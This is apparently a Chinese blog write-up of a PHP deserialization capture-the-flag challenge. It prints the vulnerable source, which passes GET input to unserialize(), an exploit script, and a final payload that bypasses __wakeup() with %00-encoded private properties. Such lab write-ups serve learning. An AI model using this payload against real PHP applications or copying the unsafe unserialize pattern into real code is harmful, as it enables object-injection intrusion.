首页 > 编程语言 >[极客大挑战 2019]PHP

[极客大挑战 2019]PHP

时间:2024-09-11 10:51:16浏览次数:13  
标签:username 极客 14 echo flag PHP 2019 password php

1、页面提示有备份文件,使用kali中命令dirsearch扫描

2、我的字典不够,扫不出,看了别人的扫出来是www.zip

3、访问www.zip之后会下载压缩包,里面有三个php文件

4、class.php

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

index.php是一个网页信息,但是里面有一小段php代码

<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>

flag.php

<?php
$flag = 'Syc{dog_dog_dog_dog}';
?>

5、根据代码分析,构造exp

<?php
class Name{
    private $username = 'admin';
    private $password = 100;

}

$select = new Name();
$res = serialize(@$select);
echo $res;
?>

6、运行得

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

7、因为username和password为私有属性,所以需要添加%00绕过,当修改属性的个数大于真是属性是,可以绕过__wakeup()

8、最终payload

select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

参考WP:

http://t.csdnimg.cn/uyw7e

http://t.csdnimg.cn/rjFfQ

标签:username,极客,14,echo,flag,PHP,2019,password,php
From: https://blog.csdn.net/2201_75556700/article/details/142133781

相关文章

  • 营业执照识别OCR接口如何用PHP调用
    一、什么是营业执照OCR识别接口?营业执照识别OCR接口,即营业执照识别,通过上传图片或URL,识别图片内容,能够识别营业执照上的多种信息,如企业名称、统一社会信用代码、法定代表人等基本信息,以及经营范围、注册地址等详细信息。二、营业执照OCR识别接口适用哪些场景?例如:电商与零售......
  • [COCI2019-2020#5] Zapina
    [COCI2019-2020#5]Zapina题意有\(n\)个不同的人和\(n\)道不同的题。第\(i\)个人开心当且仅当他被分配到\(i\)道题。求让至少一个人开心的分配方案数。、思路1定义\(dp_{i,j}\)表示前\(i\)个人发\(j\)道题,没人开心的方案数。答案等于\(n^n-dp_{n,n}\)。\[d......
  • php对接飞书机器人,根据手机号给指定人推送消息
    工具类:<?phpnamespacecommon\components;classFeishu{publicstaticfunctiongetToken($config){$url=$config['serverUrl'].'auth/v3/app_access_token/internal';$data=["app_id&qu......
  • Windows Server 2019上离线安装.NET Framework 3.5
    1、打开服务器管理器首先,下载sxs文件。然后打开服务器管理器,点击左侧的“仪表盘”,如下图所示。https://chaonb.lanzouw.com/ifOU01rvm7gf密码:666 2、添加角色和功能点击上图中的“添加角色和功能”,弹出下图所示“添加角色和功能向导”。3、选择安装功能一直点击“下......
  • 【漏洞复现】用友 U8CRM /pub/help.php 任意文件读取漏洞
    免责声明:        本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该明白,在利用本文提到的漏洞信息或进行相关测试时,可能会违反某些法律法规......
  • 计算机毕业设计必看必学!!11959 springboot校企对接实习管理系统,原创定制程序, java、
    摘 要校企合作实习是一种重要的实践教学模式,但是在实际的推行过程中,存在许多管理问题。其中包括远程指导困难、学生管理困难、校企信息沟通不畅等问题一直困扰着校方负责管理实习的教师们。随着互联网系统开发技术的发展,应用web技术开发B/s模式的实习管理系统,根据用户需求,......
  • 计算机毕业设计必看必学!! 88705 SpringBoot社区配送服务系统小程序,原创定制程序, jav
    摘要随着科学技术的飞速发展,社会的方方面面、各行各业都在努力与现代的先进技术接轨,通过科技手段来提高自身的优势,社区当然也不例外。社区配送服务系统小程序是以实际运用为开发背景,运用软件工程原理和开发方法,采用Java技术构建的一个管理系统。整个开发过程首先对软件系统进......
  • 计算机毕业设计必看必学!!12222 springboo儿童疫苗预约系统 ,原创定制程序, java、PHP
    摘  要随着社会的发展,社会的各行各业都在利用信息化时代的优势。计算机的优势和普及使得各种信息系统的开发成为必需。儿童疫苗预约管理,主要的模块包括查看首页、站点管理(轮播图、公告栏)用户管理(管理员、系统用户)内容管理(资讯列表、分类列表)更多管理(预约订单、疫苗信息、......
  • 计算机毕业设计必看必学!!11819 ssm球鞋资讯交流平台,原创定制程序, java、PHP、python
    摘 要随着科学技术的飞速发展,社会的方方面面、各行各业都在努力与现代的先进技术接轨,通过科技手段来提高自身的优势,球鞋资讯交流平台当然也不能排除在外。球鞋资讯交流平台是以实际运用为开发背景,运用软件工程原理和开发方法,采用 SSM技术构建的一个管理平台。整个开发过程......
  • 计算机毕业设计必看必学!! 11779 猪场管理系统的设计与实现,原创定制程序, java、PHP、
    摘要信息化社会内需要与之针对性的信息获取途径,但是途径的扩展基本上为人们所努力的方向,由于站在的角度存在偏差,人们经常能够获得不同类型信息,这也是技术最为难以攻克的课题。针对猪场管理系统等问题,对猪场管理系统进行研究分析,然后开发设计出猪场管理系统以解决问题。猪......